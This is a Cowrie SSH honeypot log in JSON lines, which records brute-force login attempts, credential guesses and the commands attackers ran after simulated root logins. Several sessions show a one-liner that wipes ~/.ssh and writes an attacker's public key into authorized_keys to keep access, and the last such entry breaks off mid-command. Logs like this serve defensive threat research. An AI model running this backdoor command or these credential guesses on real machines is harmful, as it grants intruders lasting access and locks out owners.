{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-08T23:36:44.038565Z","src_ip":"212.227.235.229","session":"a1773dd769e1"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:36:44.040144Z","src_ip":"212.227.235.229","session":"a1773dd769e1"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":33610,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7353398fd4d","protocol":"ssh","message":"New connection: 46.101.8.63:33610 (1.2.3.4:22) [session: d7353398fd4d]","sensor":"my-vps","timestamp":"2025-09-08T23:37:06.780385Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:37:06.781367Z","src_ip":"46.101.8.63","session":"d7353398fd4d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:37:06.806209Z","src_ip":"46.101.8.63","session":"d7353398fd4d"}
{"eventid":"cowrie.login.failed","username":"jake","password":"jake1234","message":"login attempt [jake/jake1234] failed","sensor":"my-vps","timestamp":"2025-09-08T23:37:06.941188Z","src_ip":"46.101.8.63","session":"d7353398fd4d"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:37:07.967464Z","src_ip":"46.101.8.63","session":"d7353398fd4d"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":55326,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fdda4795753","protocol":"ssh","message":"New connection: 93.113.63.124:55326 (1.2.3.4:22) [session: 9fdda4795753]","sensor":"my-vps","timestamp":"2025-09-08T23:37:18.188357Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:37:18.207126Z","src_ip":"93.113.63.124","session":"9fdda4795753"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:37:18.277830Z","src_ip":"93.113.63.124","session":"9fdda4795753"}
{"eventid":"cowrie.login.success","username":"root","password":"Cn123456","message":"login attempt [root/Cn123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:37:18.622800Z","src_ip":"93.113.63.124","session":"9fdda4795753"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:37:18.858858Z","src_ip":"93.113.63.124","session":"9fdda4795753"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:37:18.859615Z","src_ip":"93.113.63.124","session":"9fdda4795753"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:37:18.860681Z","src_ip":"93.113.63.124","session":"9fdda4795753"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:37:19.104924Z","src_ip":"93.113.63.124","session":"9fdda4795753"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:37:19.261930Z","src_ip":"93.113.63.124","session":"9fdda4795753"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:37:19.262684Z","src_ip":"93.113.63.124","session":"9fdda4795753"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:37:19.335915Z","src_ip":"93.113.63.124","session":"9fdda4795753"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:37:19.336844Z","src_ip":"93.113.63.124","session":"9fdda4795753"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":55342,"dst_ip":"1.2.3.4","dst_port":22,"session":"055c579e3600","protocol":"ssh","message":"New connection: 93.113.63.124:55342 (1.2.3.4:22) [session: 055c579e3600]","sensor":"my-vps","timestamp":"2025-09-08T23:37:19.476614Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:37:19.487189Z","src_ip":"93.113.63.124","session":"055c579e3600"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:37:19.601876Z","src_ip":"93.113.63.124","session":"055c579e3600"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:37:19.940461Z","src_ip":"93.113.63.124","session":"055c579e3600"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:37:21.050758Z","src_ip":"93.113.63.124","session":"055c579e3600"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":55358,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bcc4edc8e41","protocol":"ssh","message":"New connection: 93.113.63.124:55358 (1.2.3.4:22) [session: 0bcc4edc8e41]","sensor":"my-vps","timestamp":"2025-09-08T23:37:21.121122Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:37:21.122303Z","src_ip":"93.113.63.124","session":"0bcc4edc8e41"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:37:21.193596Z","src_ip":"93.113.63.124","session":"0bcc4edc8e41"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:37:21.576115Z","src_ip":"93.113.63.124","session":"0bcc4edc8e41"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:37:21.650378Z","src_ip":"93.113.63.124","session":"9fdda4795753"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:37:21.651379Z","src_ip":"93.113.63.124","session":"0bcc4edc8e41"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":56658,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ea6531b3011","protocol":"ssh","message":"New connection: 182.18.161.165:56658 (1.2.3.4:22) [session: 8ea6531b3011]","sensor":"my-vps","timestamp":"2025-09-08T23:37:31.484162Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:37:31.485160Z","src_ip":"182.18.161.165","session":"8ea6531b3011"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:37:31.737396Z","src_ip":"182.18.161.165","session":"8ea6531b3011"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":34322,"dst_ip":"1.2.3.4","dst_port":22,"session":"978399a91399","protocol":"ssh","message":"New connection: 45.150.34.92:34322 (1.2.3.4:22) [session: 978399a91399]","sensor":"my-vps","timestamp":"2025-09-08T23:37:32.322317Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:37:32.322965Z","src_ip":"45.150.34.92","session":"978399a91399"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:37:32.340593Z","src_ip":"45.150.34.92","session":"978399a91399"}
{"eventid":"cowrie.login.failed","username":"white","password":"!","message":"login attempt [white/!] failed","sensor":"my-vps","timestamp":"2025-09-08T23:37:32.452013Z","src_ip":"45.150.34.92","session":"978399a91399"}
{"eventid":"cowrie.login.failed","username":"service","password":"111","message":"login attempt [service/111] failed","sensor":"my-vps","timestamp":"2025-09-08T23:37:32.787083Z","src_ip":"182.18.161.165","session":"8ea6531b3011"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:37:33.472044Z","src_ip":"45.150.34.92","session":"978399a91399"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:37:34.041853Z","src_ip":"182.18.161.165","session":"8ea6531b3011"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55168,"dst_ip":"1.2.3.4","dst_port":22,"session":"69d4ad07373e","protocol":"ssh","message":"New connection: 212.227.125.160:55168 (1.2.3.4:22) [session: 69d4ad07373e]","sensor":"my-vps","timestamp":"2025-09-08T23:37:36.261226Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:37:36.349553Z","src_ip":"212.227.125.160","session":"69d4ad07373e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34228,"dst_ip":"1.2.3.4","dst_port":22,"session":"d98b47103cc9","protocol":"ssh","message":"New connection: 212.227.235.229:34228 (1.2.3.4:22) [session: d98b47103cc9]","sensor":"my-vps","timestamp":"2025-09-08T23:37:46.805477Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:37:46.806230Z","src_ip":"212.227.235.229","session":"d98b47103cc9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:37:47.124038Z","src_ip":"212.227.235.229","session":"d98b47103cc9"}
{"eventid":"cowrie.login.success","username":"root","password":"century","message":"login attempt [root/century] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:37:48.636920Z","src_ip":"212.227.235.229","session":"d98b47103cc9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:37:49.331054Z","src_ip":"212.227.235.229","session":"d98b47103cc9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:37:49.331759Z","src_ip":"212.227.235.229","session":"d98b47103cc9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:37:49.332913Z","src_ip":"212.227.235.229","session":"d98b47103cc9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:37:49.653781Z","src_ip":"212.227.235.229","session":"d98b47103cc9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:37:50.309068Z","src_ip":"212.227.235.229","session":"d98b47103cc9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= 